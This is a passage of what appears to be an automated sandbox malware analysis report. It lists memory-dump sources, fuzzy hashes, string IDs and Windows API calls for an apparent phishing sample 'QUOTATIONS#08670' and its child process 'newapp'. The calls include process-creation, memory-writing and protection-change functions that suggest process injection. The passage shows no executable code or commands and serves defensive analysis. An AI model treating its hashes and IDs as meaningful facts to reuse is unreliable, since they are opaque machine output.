                                                          • Opcode Fuzzy Hash: bc626f5d4948c4bfa3b0cb2b8883f909f3f73cc36d662f0c948743789d1a8a8c
                                                          • Instruction Fuzzy Hash: 66122A70A0021ACFDB68DF65C954A9DB7B6FF84304F2085A9D40AAB264EF359D45CF81
                                                          Strings
Memory Dump Source
• Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
Similarity
• API ID:
• String ID: $_q$$_q$$_q$$_q$$_q$$_q$$_q$$_q
• API String ID: 0-2216122830
• Opcode ID: f00d18edf465a8333c1f693a10321aba6ce5684ae55fec0a3e29771fb780bdd1
• Instruction ID: 549ab3fba3c4db0feca8b28b4cb60a74233b70b48bc0afd499fe2da13871540f
• Opcode Fuzzy Hash: f00d18edf465a8333c1f693a10321aba6ce5684ae55fec0a3e29771fb780bdd1
• Instruction Fuzzy Hash: 08916DB0A0020ADFEB64DF65D944B6E7BFAFF84704F108569E402AB394DB789C45CB90
Strings
Memory Dump Source
• Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
Similarity
• API ID:
• String ID: .5wq$$_q$$_q$$_q$$_q$$_q$$_q
• API String ID: 0-3129995876
• Opcode ID: 1fcfe3149482a67460322c15fccc229a8bae828aedc89e25e2f91aecfb666bf3
• Instruction ID: fed19962be3888a39493ee6a1a3d662f346b6ccf8c8360c5683a7c6c4c2b77d3
• Opcode Fuzzy Hash: 1fcfe3149482a67460322c15fccc229a8bae828aedc89e25e2f91aecfb666bf3
• Instruction Fuzzy Hash: C7F15D70A00205DFDB59DF69C554A6EBBB6FF94304F208579D406AB3A9CB39AC42CB81
Strings
Memory Dump Source
• Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
Similarity
• API ID:
• String ID: $_q$$_q$$_q$$_q$$_q$$_q
• API String ID: 0-155944776
• Opcode ID: 5d5f844b31f9e7f3f3ca0f2099b77a34f4c159d7d9cb293ec97833b9f132f9da
• Instruction ID: ca2699110eaea865e1b0617955658e61845ab9924f7f1f22b0a33384cc180e5b
• Opcode Fuzzy Hash: 5d5f844b31f9e7f3f3ca0f2099b77a34f4c159d7d9cb293ec97833b9f132f9da
• Instruction Fuzzy Hash: 5071AFB0F0021A8FDB68DF69DA4066DB7A6FF84304F1085AAD406EB358DB74DD46CB81
Strings
Memory Dump Source
• Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
Similarity
• API ID:
• String ID: $_q$$_q$$_q$$_q
• API String ID: 0-1171383116
• Opcode ID: faa495a4ee42eec017de2fe99f502d49705b9a5507908982fd9827fc975adfec
• Instruction ID: c67470edda3edcc0676dc68b90f1eef6f01a671c794e7e76dc575bcae2d38627
• Opcode Fuzzy Hash: faa495a4ee42eec017de2fe99f502d49705b9a5507908982fd9827fc975adfec
• Instruction Fuzzy Hash: E2B16A70A10609CFDB64DF65C59469EBBB2FF94304F2488AAD406DB3A4DB74DC82CB81
Strings
Memory Dump Source
• Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
Similarity
• API ID:
• String ID: $_q$$_q$$_q$$_q
• API String ID: 0-1171383116
• Opcode ID: 5c8422e8f72432beac50d1fb321d5ec64dd766b4110df48efd9c87e8f5c14771
• Instruction ID: 13650587217e2aadaafa6c79bffd80eedfa99e02b808ee253adcd3be01f7b43e
• Opcode Fuzzy Hash: 5c8422e8f72432beac50d1fb321d5ec64dd766b4110df48efd9c87e8f5c14771
• Instruction Fuzzy Hash: 1851C2B4A10205DFDF65DB24D980AADB7BAFF84305F2085A9E406EB354CB35DC42CB91
Strings
Memory Dump Source
• Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
Similarity
• API ID:
• String ID: LR_q$LR_q$$_q$$_q
• API String ID: 0-2912794808
• Opcode ID: c3ea724b1f86e0f2a972a200d8625beabf8e9008e3c692ab4a3e44ac7def03a5
• Instruction ID: 20ba4ba709e5546fcf74ea19b1ae24fc6a4102a10b8f9d1456f1931f19afc6a4
• Opcode Fuzzy Hash: c3ea724b1f86e0f2a972a200d8625beabf8e9008e3c692ab4a3e44ac7def03a5
• Instruction Fuzzy Hash: 7E51A074B006029FDB58EF29D950A6A77E6FF88314B1095ADE406EB3A5DB34EC00CB91

Execution Graph

Execution Coverage: 19.9%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 155
Total number of Limit Nodes: 8
Strings
Memory Dump Source
• Source File: 00000008.00000002.2574293005.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2f60000_newapp.jbxd
Similarity
• API ID:
• String ID: (o_q$(o_q$(o_q$(o_q$(o_q$(o_q$(o_q$,cq$,cq
• API String ID: 0-2006360050
• Opcode ID: e233c28006e0bbee007404682d69032a55d792f6acbacee53345869adab7cbac
• Instruction ID: d49913f1e694c91e1e8877d0c1c80e0ece413b7323d4ad2321c5f9cd9d75d90f
• Opcode Fuzzy Hash: e233c28006e0bbee007404682d69032a55d792f6acbacee53345869adab7cbac
• Instruction Fuzzy Hash: 0B826D31A00209DFCB15CF68D998AAEBBF2FF88394F158559E506EB2A5D730EC45CB50

Control-flow Graph

Memory Dump Source
• Source File: 00000008.00000002.2607359314.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7890000_newapp.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a104c7ba003bee0339c2e89c4f935d6f5e892394d6a67e6d6025d989b97dc430
• Instruction ID: ecfb403a681c3e76d0b93f4637b3612574f015b1e2563cb42eeca34d43910776
• Opcode Fuzzy Hash: a104c7ba003bee0339c2e89c4f935d6f5e892394d6a67e6d6025d989b97dc430
• Instruction Fuzzy Hash: 78B31670E112198FCB68EF39EA896ACBBB2FB89300F4045E9D049A7350DB385D95DF51

Control-flow Graph

Memory Dump Source
• Source File: 00000008.00000002.2607359314.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7890000_newapp.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c51ff33ff7037a381ad5c04966485bb16a05df2fba986aa28391f8318dd429d2
• Instruction ID: 689163c4cec7206942973a7f9235fae571487cd6d03c97a4e69a14ab42276e42
• Opcode Fuzzy Hash: c51ff33ff7037a381ad5c04966485bb16a05df2fba986aa28391f8318dd429d2
• Instruction Fuzzy Hash: A3B31670E112198FCB68EF39EA896ACBBB2FB89300F4045E9D049A7350DB385D95DF51

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000008.00000002.2574293005.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2f60000_newapp.jbxd
Similarity
• API ID:
• String ID: U$Xcq$$_q
• API String ID: 0-3790087148
• Opcode ID: dca7f696df6ed107b3c4aca485d0a608f5d17227a67038829b54522ba9896923
• Instruction ID: 1b52ad63723cba96fbf512d4efc2636d7bf81a87da2dfc06b06755db7bd6213d
• Opcode Fuzzy Hash: dca7f696df6ed107b3c4aca485d0a608f5d17227a67038829b54522ba9896923
• Instruction Fuzzy Hash: C891A235B002189BCB69AFB4945867F7BB7BFC8740B55842DE506EB388CE349C069791
Strings
Memory Dump Source
• Source File: 00000008.00000002.2607359314.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7890000_newapp.jbxd
Similarity
• API ID:
• String ID: @$TJdq$Te_q
• API String ID: 0-4144917423
• Opcode ID: 3624034df1b2d8ea2ffd03bd7c5bcbeb1a2f1112781dc518540be1bf8bcc2c6b
• Instruction ID: eb4d09dd3e0da166a3af8d42d61e389eb38fc3d526187a3fa4a5833a63ecec67
• Opcode Fuzzy Hash: 3624034df1b2d8ea2ffd03bd7c5bcbeb1a2f1112781dc518540be1bf8bcc2c6b
• Instruction Fuzzy Hash: A941889260E3D24FD7035734983465A7FB1AF97114B1E41DBD186CF6E3D9298C0AC3A6
APIs
• GetSystemMetrics.USER32(00000023), ref: 06374A88
Memory Dump Source
• Source File: 00000008.00000002.2604942022.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6370000_newapp.jbxd
Similarity
• API ID: MetricsSystem
• String ID:
• API String ID: 4116985748-0
• Opcode ID: 4277153f9d766852dd155bede35f5d17f9d532de87c11202d8229eaa5442ce53
• Instruction ID: e23d9f4de6f8b8b48e0425b5883e29469b54a90fdbb14a18c82e333d621dc19a
• Opcode Fuzzy Hash: 4277153f9d766852dd155bede35f5d17f9d532de87c11202d8229eaa5442ce53
• Instruction Fuzzy Hash: 91711674A10209EFCB94CF69D888AAEBBF5FF48321F114459E905AB361D735E885CF90
Strings
Memory Dump Source
• Source File: 00000008.00000002.2607359314.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7890000_newapp.jbxd
Similarity
• API ID:
• String ID: TJdq$Te_q
• API String ID: 0-3934155944
• Opcode ID: 7d9c11c9a39f7d2f4f1d093d0c228defd3585a6614a85a412c683ad772909a7a
• Instruction ID: 923a3f0614e3d6a3b89206603686bce1ba4a4df91a4fac6cd244036f9f4bd852
• Opcode Fuzzy Hash: 7d9c11c9a39f7d2f4f1d093d0c228defd3585a6614a85a412c683ad772909a7a
• Instruction Fuzzy Hash: 13F096327100215FCA48A77DB46893E77DFBFCDA203154459E90ACF3A5CE65DC0683AA
Strings
Memory Dump Source
• Source File: 00000008.00000002.2607359314.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7890000_newapp.jbxd
Similarity
• API ID:
• String ID: Te_q
• API String ID: 0-823545363
• Opcode ID: cb115131fac02f96ede73d099d98d22d6da2e7c336853bbd9413c879e9e2fd7d
• Instruction ID: c7d2328a3447273a026bc7fa7c62422618048596e9ca235767c12c54ae12cae5
• Opcode Fuzzy Hash: cb115131fac02f96ede73d099d98d22d6da2e7c336853bbd9413c879e9e2fd7d
• Instruction Fuzzy Hash: FC127D71A102258BC744FFB9D98966DBBF6FB88704F808429D489E7390DF38AC06C752
Strings
Memory Dump Source
• Source File: 00000008.00000002.2607359314.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7890000_newapp.jbxd
Similarity
• API ID:
• String ID: Te_q
• API String ID: 0-823545363
• Opcode ID: d163a59679d5557ca14dd94d27cd73073a6babd2dc4a4ec0e7e24c0b4ba9f21a
• Instruction ID: e1507c824a0c029a69aebe3a846afbb00702205066b14a7d1ae96a82b5cdd168
• Opcode Fuzzy Hash: d163a59679d5557ca14dd94d27cd73073a6babd2dc4a4ec0e7e24c0b4ba9f21a
• Instruction Fuzzy Hash: 29126C71B102258BC744BFB9D98966DBBF6FB88704F808469D489E7394DF38AC06C752
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 0622939E
Memory Dump Source
• Source File: 00000008.00000002.2604458509.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6220000_newapp.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: e5fd0d679ba6f4990c1675fb38a33ab7ad0debf11df1791f0b6efdff59114e97
• Instruction ID: d1fe8b2c4310595b4994d4f91b61e341e5c28d4b83d187e2324233ed319eabb8
• Opcode Fuzzy Hash: e5fd0d679ba6f4990c1675fb38a33ab7ad0debf11df1791f0b6efdff59114e97
• Instruction Fuzzy Hash: 068139B0A20B169FD7A4DF6AD54475ABBF1BF88300F008A2DD84AD7A50D775E489CB90
APIs
• CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 08109CF3
Memory Dump Source
• Source File: 00000008.00000002.2608804471.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_8100000_newapp.jbxd
Similarity
• API ID: CreateProcessUser
• String ID:
• API String ID: 2217836671-0
• Opcode ID: 7d6a92c51d2f94ffcb10564c0716bddb7c2ae0161c9c39e6daba44c49a1a231b
• Instruction ID: 9e6eba63d1b2c622c9b169b3bf2bd0ed728065863f4448b41de8d2fdfce699c5
• Opcode Fuzzy Hash: 7d6a92c51d2f94ffcb10564c0716bddb7c2ae0161c9c39e6daba44c49a1a231b
• Instruction Fuzzy Hash: 9551F7B1D00269DFDB24CF99C950BDDBBB5BF48314F0480AAE918B7251DB719A85CFA0
APIs
• CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 08109CF3
Memory Dump Source
• Source File: 00000008.00000002.2608804471.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_8100000_newapp.jbxd
Similarity
• API ID: CreateProcessUser
• String ID:
• API String ID: 2217836671-0
• Opcode ID: 51dece8189c2548c001c957f98f0ce50357748caf605dba893dd2ed1fbb9606b
• Instruction ID: f8df62384ddc4425f78f0735f305e2f40821903c1f209c528284a3c248768880
• Opcode Fuzzy Hash: 51dece8189c2548c001c957f98f0ce50357748caf605dba893dd2ed1fbb9606b
• Instruction Fuzzy Hash: 4151F7B1D00269DFDB24CF99C950BDDBBB5BF48314F0480AAE918B7251DB719A85CFA0
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0622FB62
Memory Dump Source
• Source File: 00000008.00000002.2604458509.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6220000_newapp.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 2190d4af19e41652d4b710829c37b0e93902ce581f018a3e5222e9e69a4f6c33
• Instruction ID: 3823c21b86951d48dd87e60ad7da0eced8ca96445983de1d6dc61bcec5d92908
• Opcode Fuzzy Hash: 2190d4af19e41652d4b710829c37b0e93902ce581f018a3e5222e9e69a4f6c33
• Instruction Fuzzy Hash: 9751F3B1C1025AAFCF11CFA9C990ADDBFB5BF48310F15815AE818AB221D7759855CF90
APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0622FB62
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2604458509.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_6220000_newapp.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: 3f3119fca29ec7865b3b4a475432dc40ca5db8a9dab82f47cfab9655aafa6c78
                                                          • Instruction ID: 87d410523d3a4a7e46aa4c312436e15020249cc4f3bdb2b5d3834ceb1dda7296
                                                          • Opcode Fuzzy Hash: 3f3119fca29ec7865b3b4a475432dc40ca5db8a9dab82f47cfab9655aafa6c78
                                                          • Instruction Fuzzy Hash: 6A41CFB1D10319EFDB14CFAAC994ADEBBB5BF48310F24812AE818AB210D7749845CF90
                                                          APIs
                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 063723B1
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2604942022.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_6370000_newapp.jbxd
                                                          Similarity
                                                          • API ID: CallProcWindow
                                                          • String ID:
                                                          • API String ID: 2714655100-0
                                                          • Opcode ID: 6f6246ea9c9d7547521747f5c71dd4829dfb484a952a156888c253c0c24b798c
                                                          • Instruction ID: 685bc323ffc2e0eff6b846cae90793e124c302a810e290b2d883b9a697cacec3
                                                          • Opcode Fuzzy Hash: 6f6246ea9c9d7547521747f5c71dd4829dfb484a952a156888c253c0c24b798c
                                                          • Instruction Fuzzy Hash: 4E3169B9A00305CFDB54CF59C848AAABBF5FF88314F25C459E418AB321D334A985CFA0
                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0810C348
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2608804471.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_8100000_newapp.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: ffc176d79a20a5d844b80a6e6f1e9684860916169ada03530d8138f22d719a6b
                                                          • Instruction ID: 60c674050004167fc861edc6ce409306579d5705faf24c4892af253ec40bd6f2
                                                          • Opcode Fuzzy Hash: ffc176d79a20a5d844b80a6e6f1e9684860916169ada03530d8138f22d719a6b
                                                          • Instruction Fuzzy Hash: 362146719003099FCB10CFA9C981BDEBBF5FF48310F10842AE919A7240C7789944DFA0
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0622BAB7
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2604458509.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_6220000_newapp.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 3a65b4cf78cacdc2eafedff2db8ff2d40d619cd42a0c03a91a9d24a5904e6d99
                                                          • Instruction ID: 6452a0d1dc432fa5e119bcd749bcdded20a736ad2b4d745c6b51a85742353583
                                                          • Opcode Fuzzy Hash: 3a65b4cf78cacdc2eafedff2db8ff2d40d619cd42a0c03a91a9d24a5904e6d99
                                                          • Instruction Fuzzy Hash: E62103B5C10209EFDB10CFA9D584AEEBBF4FB18314F14841AE958A3310D374A944CFA1
                                                          APIs
                                                          • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0810B90E
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2608804471.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_8100000_newapp.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: 24744c57c9d8f6b4acd0f461112762f659ae45ff87feff79599ebc437d48ada6
                                                          • Instruction ID: 38420f1491f2b3395c45f3c4026dbba3d1a8a0ea9280e9324e6444b7c7b8aad9
                                                          • Opcode Fuzzy Hash: 24744c57c9d8f6b4acd0f461112762f659ae45ff87feff79599ebc437d48ada6
                                                          • Instruction Fuzzy Hash: 6A2134B1D042099FDB10DFAAC8857EEBBF4EF88324F10842ED419A7240C778A945CFA0
                                                          APIs
                                                          • DeleteFileW.KERNELBASE(00000000), ref: 077DAD40
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2606887778.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_77d0000_newapp.jbxd
                                                          Similarity
                                                          • API ID: DeleteFile
                                                          • String ID:
                                                          • API String ID: 4033686569-0
                                                          • Opcode ID: ce03c85ab7928a1dfdd8b665cfaf2df90a6a5dfa3829e8ff2bb6e38dec3e6564
                                                          • Instruction ID: 24f252cfaf81ed594a9f697b4c7b740b2895adadfde8b7c9e41d19c27f6aef75
                                                          • Opcode Fuzzy Hash: ce03c85ab7928a1dfdd8b665cfaf2df90a6a5dfa3829e8ff2bb6e38dec3e6564
                                                          • Instruction Fuzzy Hash: 362133B1C0061A9BCB10DF9AD445AEEFBB4BB49320F15862AD818A7244D338A945CFA5
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0622BAB7
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2604458509.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_6220000_newapp.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 580765c4d5c2a4a3d5d330f0439e3340acf5dc0eeeb70d803b0579bc843d10e5
                                                          • Instruction ID: d01a2e802a6e2b8873e9d2359a3d69334e49024c355e21ea854cd8bfed25524a
                                                          • Opcode Fuzzy Hash: 580765c4d5c2a4a3d5d330f0439e3340acf5dc0eeeb70d803b0579bc843d10e5
                                                          • Instruction Fuzzy Hash: E821E4B5D10209AFDB10CFAAD984ADEBBF8FB48310F14801AE918A3310D374A944CFA1
                                                          APIs
                                                          • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 0810CA7F
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2608804471.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_8100000_newapp.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 944196f7d34e252c0b066f4e77e4b87167acce94f216b3fcce4049af31495cbf
                                                          • Instruction ID: 34f4599ff1e44d6a88c085450d298f7729fe16e6f1051ddd637ad0f14488f3d3
                                                          • Opcode Fuzzy Hash: 944196f7d34e252c0b066f4e77e4b87167acce94f216b3fcce4049af31495cbf
                                                          • Instruction Fuzzy Hash: 112147B1C002099FCB10DFAAC845AEEFBF4EF48320F10842EE519A7250D7799945CFA1
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0810272B
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2608804471.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_8100000_newapp.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: de58eff6e3467740e74c1b88ec20064e6c7d35440641f5cb88e3484ebc535c05
                                                          • Instruction ID: 42f0b5a29d00274f39de9abd0efdae421e9c0c3c25b1194fdeaeff4b3f5cfefe
                                                          • Opcode Fuzzy Hash: de58eff6e3467740e74c1b88ec20064e6c7d35440641f5cb88e3484ebc535c05
                                                          • Instruction Fuzzy Hash: 152106B59002499FCB10DF9AD484ADEFBF4AF89320F10842AE458A7251D375A944CFA1
                                                          APIs
                                                          • DeleteFileW.KERNELBASE(00000000), ref: 077DAD40
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2606887778.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_77d0000_newapp.jbxd
                                                          Similarity
                                                          • API ID: DeleteFile
                                                          • String ID:
                                                          • API String ID: 4033686569-0
                                                          • Opcode ID: a38e582df64b5b3b2b0b5ab10c283e2ab9eeb336d95f7f4d5d39aa2b6cb38645
                                                          • Instruction ID: 54985e1e7e3343c13fb795fda91bc99813598da2bbfce2f3dfb49d8c1eac779f
                                                          • Opcode Fuzzy Hash: a38e582df64b5b3b2b0b5ab10c283e2ab9eeb336d95f7f4d5d39aa2b6cb38645
                                                          • Instruction Fuzzy Hash: E31133B1C0061A9BCB20CF9AD444B9EFBB4BB48320F15852AD818B7244D378A954CFA5
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0810272B
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2608804471.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_8100000_newapp.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 623afabd21a6d604ab277b89b87449a4e5d80126db59d9e783d17f73ae0a5518
                                                          • Instruction ID: e510bfdde01e5dc574f8b26979e0dc691a59a8f045a5a069efa705c21a29b09e
                                                          • Opcode Fuzzy Hash: 623afabd21a6d604ab277b89b87449a4e5d80126db59d9e783d17f73ae0a5518
                                                          • Instruction Fuzzy Hash: EA21F6B59002499FCB10DF9AD984BDEFBF4FF48320F10842AE958A7251D379A944CFA1
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0810BFE6
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2608804471.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_8100000_newapp.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 2fd9fa3dc3dc224d70448cd4c6d75204342901a974b430d10f0eeee7083756fd
                                                          • Instruction ID: 420f2177a8bf0d4a066db47ffd40a2aa9e50fbf866adedc219478ffca609a094
                                                          • Opcode Fuzzy Hash: 2fd9fa3dc3dc224d70448cd4c6d75204342901a974b430d10f0eeee7083756fd
                                                          • Instruction Fuzzy Hash: AE1146719042499FCB20DFAAD845AEFFFF5EF88320F10841AE519A7250C775A954CFA0
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0622939E
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2604458509.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_6220000_newapp.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: c7358f04548ad536251a9ff46a8a282a3fe492990e4c74795ddccffd12c8a867
                                                          • Instruction ID: 48dd16654f853c76357d906627e93070ae093d0d16b3bc006ca1b465a9ac1c5d
                                                          • Opcode Fuzzy Hash: c7358f04548ad536251a9ff46a8a282a3fe492990e4c74795ddccffd12c8a867
                                                          • Instruction Fuzzy Hash: D71110B5C0024A9FCB10DF9AD444ADEFBF4BB88324F10841AD819B7250C379A545CFA1
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2607359314.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_7890000_newapp.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4fb1b63c1e1c2db4996c0bc86dd39e2cbf03477ddeb7c7aad4187f742719ea6d
                                                          • Instruction ID: c62d16c1ca2b08dc5ff85e5110295defd2d0908238e762a06dfa2662e52da86f
                                                          • Opcode Fuzzy Hash: 4fb1b63c1e1c2db4996c0bc86dd39e2cbf03477ddeb7c7aad4187f742719ea6d
                                                          • Instruction Fuzzy Hash: 5EC1DD71A142108FC344BF79D99922D7BF6BB88614F45886DE489D7390DE3C9C1ACBA2
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2607359314.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_7890000_newapp.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d6a3f0edc62e6099d24020e35f6cabf50c3120ae28cadd585aae36993427a3aa
                                                          • Instruction ID: 0f2f9972584ebba5044bd0444821e5f07e0bd4c3d8826d9759fc0ef0df9e9aff
